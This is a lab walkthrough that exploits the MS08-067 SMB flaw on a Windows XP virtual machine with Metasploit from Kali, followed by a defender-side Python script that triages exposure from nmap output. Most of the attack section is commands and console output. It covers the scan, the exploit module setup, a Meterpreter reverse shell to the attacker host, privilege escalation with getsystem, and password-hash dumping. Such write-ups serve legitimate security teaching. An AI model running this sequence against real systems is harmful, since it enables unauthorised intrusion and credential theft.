The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". If an affected system receives a specially crafted RPC request, the vulnerability can allow remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003, an attacker can exploit it to run arbitrary code without any authentication, which is why it was usable for worm attacks.
The experiment below runs in a local test environment: one Kali host as the attacker and one Windows XP machine as the target.
Kali attacker: 192.168.34.220
Windows XP target: 192.168.34.189
Step 1. Start postgresql
root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
Step 2. Start metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole
=[ metasploit v4.11.4-2015071402 ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Step 3. Check the database connection status
msf > db_status
[*] postgresql connected to msf3
Step 4. Run an nmap scan
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https?
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp open multiling-http?
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 6002/tcp open http SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open afs3-callback?
[*] Nmap: 7002/tcp open http SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds
Step 5. Search for the exploit module
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
Step 6. View the module options
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Step 7. Set the parameters
msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.189 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Step 8. Run the exploit
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.34.220:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
Step 9. A shell is returned; working in meterpreter
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
meterpreter > shell
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.34.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.34.254
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_DH-CA8822AB9589 IWAM_DH-CA8822AB9589 SUPPORT_388945a0
The command completed with one or more errors.
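As an added defender-side example (not part of the original write-up): a Python script that parses db_nmap console output in the format shown in step 4 and triages whether a host is exposed to MS08-067, based on SMB being reachable, the OS belonging to an affected family, and whether the smb-check-vulns MS08-067 check actually ran (it is disabled unless unsafe=1 is set, so "CHECK DISABLED" proves nothing about patch state). The sample input is constructed from the scan above; function names are my own.

```python
import re
# Constructed sample in the db_nmap console format shown above (abridged).
SAMPLE = """\
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
AFFECTED_OS = ("Windows 2000", "Windows XP", "Windows Server 2003")

def parse_db_nmap(text):
    """Pull host, open ports, OS guess and the MS08-067 script result from db_nmap output."""
    report = {"host": None, "open_ports": {}, "os": "", "ms08_067": "not checked"}
    for raw in text.splitlines():
        line = raw.replace("[*] Nmap: ", "", 1).strip()
        body = line.lstrip("|_ ")  # NSE script results are prefixed with '|' or '|_'
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
        elif (m := PORT_RE.match(line)) and m.group(3) == "open":
            report["open_ports"][int(m.group(1))] = m.group(4)
        elif line.startswith("OS details:"):
            report["os"] = line.partition(":")[2].strip()
        elif body.startswith("MS08-067:"):
            report["ms08_067"] = body.partition(":")[2].strip()
    return report

def assess_ms08_067(report):
    """Defender triage: is the host exposed to MS08-067, and on what evidence?"""
    reasons = []
    smb_ports = [p for p in (139, 445) if p in report["open_ports"]]
    if smb_ports:
        reasons.append(f"SMB reachable on ports {smb_ports}")
    affected = any(name in report["os"] for name in AFFECTED_OS)
    if affected:
        reasons.append(f"OS family affected by MS08-067: {report['os']}")
    vulnerable = "VULNERABLE" in report["ms08_067"]
    if vulnerable:
        reasons.append("nmap smb-check-vulns reports the host VULNERABLE")
    elif report["ms08_067"].startswith("CHECK DISABLED"):
        reasons.append("MS08-067 check not run (unsafe=1 not set); patch state unverified")
    # Exposed = attack surface present AND (affected OS guess OR positive NSE result)
    exposed = bool(smb_ports) and (affected or vulnerable)
    return {"host": report["host"], "exposed": exposed, "reasons": reasons}

if __name__ == "__main__":
    print(assess_ms08_067(parse_db_nmap(SAMPLE)))
```

A host flagged here needs the MS08-067 security update applied or its SMB ports filtered; re-run the scan with --script-args=unsafe=1 only against lab systems, since that check can crash the Server service.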
As for the target machine used in this write-up, please search for it on Baidu.